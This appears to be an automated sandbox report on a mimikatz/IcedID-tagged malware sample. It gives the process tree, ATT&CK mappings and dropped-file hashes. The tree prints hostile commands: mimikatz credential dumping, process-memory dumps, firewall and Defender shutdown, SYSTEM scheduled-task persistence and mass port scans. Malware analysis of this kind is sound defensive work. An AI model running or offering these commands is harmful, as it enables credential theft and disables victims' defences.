1452 wokakm.exe
5000 vkdejee.exe
5000 vkdejee.exe
3876 vkdejee.exe
3876 vkdejee.exe
4736 vkdejee.exe
4736 vkdejee.exe
-
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target
PID 2976 wrote to memory of 1832 2976 2024-05-30_f4da2f0ff1cb778434d64dbba8fcd89c_hacktools_icedid_mimikatz.exe 83
PID 2976 wrote to memory of 1832 2976 2024-05-30_f4da2f0ff1cb778434d64dbba8fcd89c_hacktools_icedid_mimikatz.exe 83
PID 2976 wrote to memory of 1832 2976 2024-05-30_f4da2f0ff1cb778434d64dbba8fcd89c_hacktools_icedid_mimikatz.exe 83
PID 1832 wrote to memory of 2916 1832 cmd.exe 86
PID 1832 wrote to memory of 2916 1832 cmd.exe 86
PID 1832 wrote to memory of 2916 1832 cmd.exe 86
PID 1832 wrote to memory of 5016 1832 cmd.exe 92
PID 1832 wrote to memory of 5016 1832 cmd.exe 92
PID 1832 wrote to memory of 5016 1832 cmd.exe 92
PID 316 wrote to memory of 1660 316 vkdejee.exe 94
PID 316 wrote to memory of 1660 316 vkdejee.exe 94
PID 316 wrote to memory of 1660 316 vkdejee.exe 94
PID 1660 wrote to memory of 3676 1660 cmd.exe 96
PID 1660 wrote to memory of 3676 1660 cmd.exe 96
PID 1660 wrote to memory of 3676 1660 cmd.exe 96
PID 1660 wrote to memory of 1196 1660 cmd.exe 97
PID 1660 wrote to memory of 1196 1660 cmd.exe 97
PID 1660 wrote to memory of 1196 1660 cmd.exe 97
PID 1660 wrote to memory of 3680 1660 cmd.exe 98
PID 1660 wrote to memory of 3680 1660 cmd.exe 98
PID 1660 wrote to memory of 3680 1660 cmd.exe 98
PID 1660 wrote to memory of 532 1660 cmd.exe 99
PID 1660 wrote to memory of 532 1660 cmd.exe 99
PID 1660 wrote to memory of 532 1660 cmd.exe 99
PID 1660 wrote to memory of 4572 1660 cmd.exe 100
PID 1660 wrote to memory of 4572 1660 cmd.exe 100
PID 1660 wrote to memory of 4572 1660 cmd.exe 100
PID 1660 wrote to memory of 1712 1660 cmd.exe 101
PID 1660 wrote to memory of 1712 1660 cmd.exe 101
PID 1660 wrote to memory of 1712 1660 cmd.exe 101
PID 316 wrote to memory of 4088 316 vkdejee.exe 102
PID 316 wrote to memory of 4088 316 vkdejee.exe 102
PID 316 wrote to memory of 4088 316 vkdejee.exe 102
PID 316 wrote to memory of 4472 316 vkdejee.exe 104
PID 316 wrote to memory of 4472 316 vkdejee.exe 104
PID 316 wrote to memory of 4472 316 vkdejee.exe 104
PID 316 wrote to memory of 3532 316 vkdejee.exe 106
PID 316 wrote to memory of 3532 316 vkdejee.exe 106
PID 316 wrote to memory of 3532 316 vkdejee.exe 106
PID 316 wrote to memory of 1980 316 vkdejee.exe 111
PID 316 wrote to memory of 1980 316 vkdejee.exe 111
PID 316 wrote to memory of 1980 316 vkdejee.exe 111
PID 1980 wrote to memory of 3572 1980 cmd.exe 113
PID 1980 wrote to memory of 3572 1980 cmd.exe 113
PID 1980 wrote to memory of 3572 1980 cmd.exe 113
PID 3572 wrote to memory of 5096 3572 wpcap.exe 114
PID 3572 wrote to memory of 5096 3572 wpcap.exe 114
PID 3572 wrote to memory of 5096 3572 wpcap.exe 114
PID 5096 wrote to memory of 2584 5096 net.exe 116
PID 5096 wrote to memory of 2584 5096 net.exe 116
PID 5096 wrote to memory of 2584 5096 net.exe 116
PID 3572 wrote to memory of 2140 3572 wpcap.exe 117
PID 3572 wrote to memory of 2140 3572 wpcap.exe 117
PID 3572 wrote to memory of 2140 3572 wpcap.exe 117
PID 2140 wrote to memory of 680 2140 net.exe 119
PID 2140 wrote to memory of 680 2140 net.exe 119
PID 2140 wrote to memory of 680 2140 net.exe 119
PID 3572 wrote to memory of 4804 3572 wpcap.exe 120
PID 3572 wrote to memory of 4804 3572 wpcap.exe 120
PID 3572 wrote to memory of 4804 3572 wpcap.exe 120
PID 4804 wrote to memory of 3452 4804 net.exe 122
PID 4804 wrote to memory of 3452 4804 net.exe 122
PID 4804 wrote to memory of 3452 4804 net.exe 122
PID 3572 wrote to memory of 1960 3572 wpcap.exe 123
Processes
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵PID:1440
-
C:\Windows\TEMP\rttutifin\fpibei.exe"C:\Windows\TEMP\rttutifin\fpibei.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3492
-
-
C:\Users\Admin\AppData\Local\Temp\2024-05-30_f4da2f0ff1cb778434d64dbba8fcd89c_hacktools_icedid_mimikatz.exe"C:\Users\Admin\AppData\Local\Temp\2024-05-30_f4da2f0ff1cb778434d64dbba8fcd89c_hacktools_icedid_mimikatz.exe"1⤵
- Drops file in Windows directory
- Suspicious behavior: RenamesItself
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2976 -
C:\Windows\SysWOW64\cmd.execmd /c ping 127.0.0.1 -n 5 & Start C:\Windows\gibpmken\vkdejee.exe2⤵
- Suspicious use of WriteProcessMemory
PID:1832 -
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 53⤵
- Runs ping.exe
PID:2916
-
-
C:\Windows\gibpmken\vkdejee.exeC:\Windows\gibpmken\vkdejee.exe3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:5016
-
-
-
C:\Windows\gibpmken\vkdejee.exeC:\Windows\gibpmken\vkdejee.exe1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Sets file execution options in registry
- Executes dropped EXE
- Drops file in System32 directory
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:316 -
C:\Windows\SysWOW64\cmd.execmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM2⤵
- Suspicious use of WriteProcessMemory
PID:1660 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:3676
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D users3⤵PID:1196
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:3680
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D administrators3⤵PID:532
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:4572
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM3⤵PID:1712
-
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static del all2⤵PID:4088
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add policy name=Bastards description=FuckingBastards2⤵PID:4472
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filteraction name=BastardsList action=block2⤵PID:3532
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\umubtmbps\bbrcgicuu\wpcap.exe /S2⤵
- Suspicious use of WriteProcessMemory
PID:1980 -
C:\Windows\umubtmbps\bbrcgicuu\wpcap.exeC:\Windows\umubtmbps\bbrcgicuu\wpcap.exe /S3⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Loads dropped DLL
- Drops file in System32 directory
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
PID:3572 -
C:\Windows\SysWOW64\net.exenet stop "Boundary Meter"4⤵
- Suspicious use of WriteProcessMemory
PID:5096 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "Boundary Meter"5⤵PID:2584
-
-
-
C:\Windows\SysWOW64\net.exenet stop "TrueSight Meter"4⤵
- Suspicious use of WriteProcessMemory
PID:2140 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "TrueSight Meter"5⤵PID:680
-
-
-
C:\Windows\SysWOW64\net.exenet stop npf4⤵
- Suspicious use of WriteProcessMemory
PID:4804 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop npf5⤵PID:3452
-
-
-
C:\Windows\SysWOW64\net.exenet start npf4⤵PID:1960
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf5⤵PID:3016
-
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net start npf2⤵PID:436
-
C:\Windows\SysWOW64\net.exenet start npf3⤵PID:4292
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf4⤵PID:440
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net start npf2⤵PID:2596
-
C:\Windows\SysWOW64\net.exenet start npf3⤵PID:4444
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf4⤵PID:2940
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\umubtmbps\bbrcgicuu\pivnitiek.exe -p 80 222.186.128.1-222.186.255.255 --rate=1024 -oJ C:\Windows\umubtmbps\bbrcgicuu\Scant.txt2⤵PID:4648
-
C:\Windows\umubtmbps\bbrcgicuu\pivnitiek.exeC:\Windows\umubtmbps\bbrcgicuu\pivnitiek.exe -p 80 222.186.128.1-222.186.255.255 --rate=1024 -oJ C:\Windows\umubtmbps\bbrcgicuu\Scant.txt3⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2092
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\umubtmbps\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit >> C:\Windows\umubtmbps\Corporate\log.txt2⤵
- Drops file in Windows directory
PID:4924 -
C:\Windows\umubtmbps\Corporate\vfshost.exeC:\Windows\umubtmbps\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3132
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "ilejsubhf" /ru system /tr "cmd /c C:\Windows\ime\vkdejee.exe"2⤵PID:4616
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:380
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "ilejsubhf" /ru system /tr "cmd /c C:\Windows\ime\vkdejee.exe"3⤵
- Creates scheduled task(s)
PID:3560
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "uidenmpcg" /ru system /tr "cmd /c echo Y|cacls C:\Windows\gibpmken\vkdejee.exe /p everyone:F"2⤵PID:3088
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:4464
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "uidenmpcg" /ru system /tr "cmd /c echo Y|cacls C:\Windows\gibpmken\vkdejee.exe /p everyone:F"3⤵
- Creates scheduled task(s)
PID:1244
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "nztfembbk" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\rttutifin\fpibei.exe /p everyone:F"2⤵PID:3360
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:3516
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "nztfembbk" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\rttutifin\fpibei.exe /p everyone:F"3⤵
- Creates scheduled task(s)
PID:5112
-
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=TCP2⤵PID:3952
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=UDP2⤵PID:5088
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList2⤵PID:1140
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static set policy name=Bastards assign=y2⤵PID:2564
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=TCP2⤵PID:4168
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=UDP2⤵PID:2460
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList2⤵PID:4448
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static set policy name=Bastards assign=y2⤵PID:1312
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=TCP2⤵PID:4608
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=UDP2⤵PID:2236
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList2⤵PID:3436
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static set policy name=Bastards assign=y2⤵PID:4116
-
-
C:\Windows\SysWOW64\cmd.execmd /c net stop SharedAccess2⤵PID:3316
-
C:\Windows\SysWOW64\net.exenet stop SharedAccess3⤵PID:3104
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SharedAccess4⤵PID:1576
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c netsh firewall set opmode mode=disable2⤵PID:1840
-
C:\Windows\SysWOW64\netsh.exenetsh firewall set opmode mode=disable3⤵
- Modifies Windows Firewall
PID:4724
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c netsh Advfirewall set allprofiles state off2⤵PID:4460
-
C:\Windows\SysWOW64\netsh.exenetsh Advfirewall set allprofiles state off3⤵
- Modifies Windows Firewall
PID:4452
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net stop MpsSvc2⤵PID:1752
-
C:\Windows\SysWOW64\net.exenet stop MpsSvc3⤵PID:4080
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MpsSvc4⤵PID:4228
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net stop WinDefend2⤵PID:1304
-
C:\Windows\SysWOW64\net.exenet stop WinDefend3⤵PID:756
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop WinDefend4⤵PID:3768
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net stop wuauserv2⤵PID:4800
-
C:\Windows\SysWOW64\net.exenet stop wuauserv3⤵PID:2400
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop wuauserv4⤵PID:1932
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c sc config MpsSvc start= disabled2⤵PID:5024
-
C:\Windows\SysWOW64\sc.exesc config MpsSvc start= disabled3⤵
- Launches sc.exe
PID:4924
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c sc config SharedAccess start= disabled2⤵PID:3116
-
C:\Windows\SysWOW64\sc.exesc config SharedAccess start= disabled3⤵
- Launches sc.exe
PID:3088
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c sc config WinDefend start= disabled2⤵PID:3856
-
C:\Windows\SysWOW64\sc.exesc config WinDefend start= disabled3⤵
- Launches sc.exe
PID:4916
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c sc config wuauserv start= disabled2⤵PID:3068
-
C:\Windows\SysWOW64\sc.exesc config wuauserv start= disabled3⤵
- Launches sc.exe
PID:860
-
-
-
C:\Windows\TEMP\xohudmc.exeC:\Windows\TEMP\xohudmc.exe2⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of SetWindowsHookEx
PID:652
-
-
C:\Windows\TEMP\umubtmbps\ibibzztte.exeC:\Windows\TEMP\umubtmbps\ibibzztte.exe -accepteula -mp 780 C:\Windows\TEMP\umubtmbps\780.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:3540
-
-
C:\Windows\TEMP\umubtmbps\ibibzztte.exeC:\Windows\TEMP\umubtmbps\ibibzztte.exe -accepteula -mp 388 C:\Windows\TEMP\umubtmbps\388.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:3112
-
-
C:\Windows\TEMP\umubtmbps\ibibzztte.exeC:\Windows\TEMP\umubtmbps\ibibzztte.exe -accepteula -mp 1440 C:\Windows\TEMP\umubtmbps\1440.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:4240
-
-
C:\Windows\TEMP\umubtmbps\ibibzztte.exeC:\Windows\TEMP\umubtmbps\ibibzztte.exe -accepteula -mp 2480 C:\Windows\TEMP\umubtmbps\2480.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:4724
-
-
C:\Windows\TEMP\umubtmbps\ibibzztte.exeC:\Windows\TEMP\umubtmbps\ibibzztte.exe -accepteula -mp 2720 C:\Windows\TEMP\umubtmbps\2720.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:3772
-
-
C:\Windows\TEMP\umubtmbps\ibibzztte.exeC:\Windows\TEMP\umubtmbps\ibibzztte.exe -accepteula -mp 2760 C:\Windows\TEMP\umubtmbps\2760.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:2708
-
-
C:\Windows\TEMP\umubtmbps\ibibzztte.exeC:\Windows\TEMP\umubtmbps\ibibzztte.exe -accepteula -mp 3092 C:\Windows\TEMP\umubtmbps\3092.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:4440
-
-
C:\Windows\TEMP\umubtmbps\ibibzztte.exeC:\Windows\TEMP\umubtmbps\ibibzztte.exe -accepteula -mp 3860 C:\Windows\TEMP\umubtmbps\3860.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:4464
-
-
C:\Windows\TEMP\umubtmbps\ibibzztte.exeC:\Windows\TEMP\umubtmbps\ibibzztte.exe -accepteula -mp 3956 C:\Windows\TEMP\umubtmbps\3956.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:1812
-
-
C:\Windows\TEMP\umubtmbps\ibibzztte.exeC:\Windows\TEMP\umubtmbps\ibibzztte.exe -accepteula -mp 4024 C:\Windows\TEMP\umubtmbps\4024.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:1036
-
-
C:\Windows\TEMP\umubtmbps\ibibzztte.exeC:\Windows\TEMP\umubtmbps\ibibzztte.exe -accepteula -mp 884 C:\Windows\TEMP\umubtmbps\884.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:2452
-
-
C:\Windows\TEMP\umubtmbps\ibibzztte.exeC:\Windows\TEMP\umubtmbps\ibibzztte.exe -accepteula -mp 4480 C:\Windows\TEMP\umubtmbps\4480.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:5040
-
-
C:\Windows\TEMP\umubtmbps\ibibzztte.exeC:\Windows\TEMP\umubtmbps\ibibzztte.exe -accepteula -mp 1468 C:\Windows\TEMP\umubtmbps\1468.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:392
-
-
C:\Windows\TEMP\umubtmbps\ibibzztte.exeC:\Windows\TEMP\umubtmbps\ibibzztte.exe -accepteula -mp 1348 C:\Windows\TEMP\umubtmbps\1348.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:1832
-
-
C:\Windows\TEMP\umubtmbps\ibibzztte.exeC:\Windows\TEMP\umubtmbps\ibibzztte.exe -accepteula -mp 2168 C:\Windows\TEMP\umubtmbps\2168.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:4268
-
-
C:\Windows\TEMP\umubtmbps\ibibzztte.exeC:\Windows\TEMP\umubtmbps\ibibzztte.exe -accepteula -mp 4868 C:\Windows\TEMP\umubtmbps\4868.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:5108
-
-
C:\Windows\TEMP\umubtmbps\ibibzztte.exeC:\Windows\TEMP\umubtmbps\ibibzztte.exe -accepteula -mp 4604 C:\Windows\TEMP\umubtmbps\4604.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:4060
-
-
C:\Windows\TEMP\umubtmbps\ibibzztte.exeC:\Windows\TEMP\umubtmbps\ibibzztte.exe -accepteula -mp 468 C:\Windows\TEMP\umubtmbps\468.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:4328
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c C:\Windows\umubtmbps\bbrcgicuu\scan.bat2⤵PID:1304
-
C:\Windows\umubtmbps\bbrcgicuu\fuinnkdmr.exefuinnkdmr.exe TCP 191.101.0.1 191.101.255.255 445 512 /save3⤵
- Executes dropped EXE
- Drops file in Windows directory
PID:5024
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM2⤵PID:6020
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:1616
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D users3⤵PID:5980
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:3808
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D administrators3⤵PID:3384
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:4068
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM3⤵PID:700
-
-
-
C:\Windows\SysWOW64\wokakm.exeC:\Windows\SysWOW64\wokakm.exe1⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:1452
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\gibpmken\vkdejee.exe /p everyone:F1⤵PID:3140
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"2⤵PID:5060
-
-
C:\Windows\system32\cacls.execacls C:\Windows\gibpmken\vkdejee.exe /p everyone:F2⤵PID:2988
-
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c C:\Windows\ime\vkdejee.exe1⤵PID:1836
-
C:\Windows\ime\vkdejee.exeC:\Windows\ime\vkdejee.exe2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:5000
-
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\TEMP\rttutifin\fpibei.exe /p everyone:F1⤵PID:4068
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"2⤵PID:4296
-
-
C:\Windows\system32\cacls.execacls C:\Windows\TEMP\rttutifin\fpibei.exe /p everyone:F2⤵PID:2340
-
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\gibpmken\vkdejee.exe /p everyone:F1⤵PID:4356
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"2⤵PID:3304
-
-
C:\Windows\system32\cacls.execacls C:\Windows\gibpmken\vkdejee.exe /p everyone:F2⤵PID:4228
-
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c C:\Windows\ime\vkdejee.exe1⤵PID:2856
-
C:\Windows\ime\vkdejee.exeC:\Windows\ime\vkdejee.exe2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:3876
-
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\TEMP\rttutifin\fpibei.exe /p everyone:F1⤵PID:3772
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"2⤵PID:4772
-
-
C:\Windows\system32\cacls.execacls C:\Windows\TEMP\rttutifin\fpibei.exe /p everyone:F2⤵PID:4360
-
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\gibpmken\vkdejee.exe /p everyone:F1⤵PID:4788
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"2⤵PID:5492
-
-
C:\Windows\system32\cacls.execacls C:\Windows\gibpmken\vkdejee.exe /p everyone:F2⤵PID:4344
-
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c C:\Windows\ime\vkdejee.exe1⤵PID:4288
-
C:\Windows\ime\vkdejee.exeC:\Windows\ime\vkdejee.exe2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:4736
-
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\TEMP\rttutifin\fpibei.exe /p everyone:F1⤵PID:1832
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"2⤵PID:376
-
-
C:\Windows\system32\cacls.execacls C:\Windows\TEMP\rttutifin\fpibei.exe /p everyone:F2⤵PID:4376
-
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution 1
Registry Run Keys / Startup Folder 1
Create or Modify System Process 2
Windows Service 2
Scheduled Task/Job 1
Privilege Escalation
Boot or Logon Autostart Execution 1
Registry Run Keys / Startup Folder 1
Create or Modify System Process 2
Windows Service 2
Scheduled Task/Job 1
Defense Evasion
Impair Defenses 1
Disable or Modify System Firewall 1
Modify Registry 1
Downloads
-
Filesize
95KB
MD5 86316be34481c1ed5b792169312673fd
SHA1 6ccde3a8c76879e49b34e4abb3b8dfaf7a9d77b5
SHA256 49656c178b17198470ad6906e9ee0865f16f01c1dbbf11c613b55a07246a7918
SHA512 3a6e77c39942b89f3f149e9527ab8a9eb39f55ac18a9db3a3922dfb294beb0760d10ca12be0e3a3854ff7dabbe2df18c52e3696874623a2a9c5dc74b29a860bc
-
Filesize
275KB
MD5 4633b298d57014627831ccac89a2c50b
SHA1 e5f449766722c5c25fa02b065d22a854b6a32a5b
SHA256 b967e4dce952f9232592e4c1753516081438702a53424005642700522055dbc9
SHA512 29590fa5f72e6a36f2b72fc2a2cca35ee41554e13c9995198e740608975621142395d4b2e057db4314edf95520fd32aae8db066444d8d8db0fd06c391111c6d3
-
Filesize
693B
MD5 f2d396833af4aea7b9afde89593ca56e
SHA1 08d8f699040d3ca94e9d46fc400e3feb4a18b96b
SHA256 d6ae7c6275b7a9b81ae4a4662c9704f7a68d5943fcc4b8d035e53db708659b34
SHA512 2f359d080c113d58a67f08cb44d9ab84b0dfd7392d6ddb56ca5d1b0e8aa37b984fac720e4373d4f23db967a3465fcf93cee66d7934d4211a22e1ebc640755f01
-
Filesize
343KB
MD5 2b4ac7b362261cb3f6f9583751708064
SHA1 b93693b19ebc99da8a007fed1a45c01c5071fb7f
SHA256 a5a0268c15e00692a08af62e99347f6e37ee189e9db3925ebf60835e67aa7d23
SHA512 c154d2c6e809b0b48cc2529ea5745dc4fc3ddd82f8f9d0f7f827ff5590868c560d7bec42636cb61e27cc1c9b4ac2499d3657262826bbe0baa50f66b40e28b616
-
Filesize
8.5MB
MD5 0d4ea75dffe38cd90f990ca3fed49dac
SHA1 67467e0a919ae8ecc54d32d10b638ead574e2698
SHA256 31b773a4473d045186f06fb18dc8bbf326e6efa2333a0a8f29aa20400f3b0cf6
SHA512 ad0ecce995d9131a65c1621f203ac7ed86c7df7ed87d8e1e3ae829ec2ccde078dd9611610f1486acf9562ca2851b777941db649a901609c69ef71538853bc90e
-
Filesize
4.2MB
MD5 f66e2cdd691789277a080fc44a2c7c91
SHA1 2d7f79b8e00cad0a21475ee6c26d242f15fb9ce4
SHA256 b77e8ca034f0b6d98a44aa88978e73e4839321ac66f3e540a954bb4d635b07fd
SHA512 f999ae4f0ade6afd3f8e5e5e67fa39bc557cfe25f34bac824f7f0fcf1cf226745ff6f37a5c72688c2cb39b0e0532864f4052dd807dcdcce7b5fcdff7cc1de627
-
Filesize
26.3MB
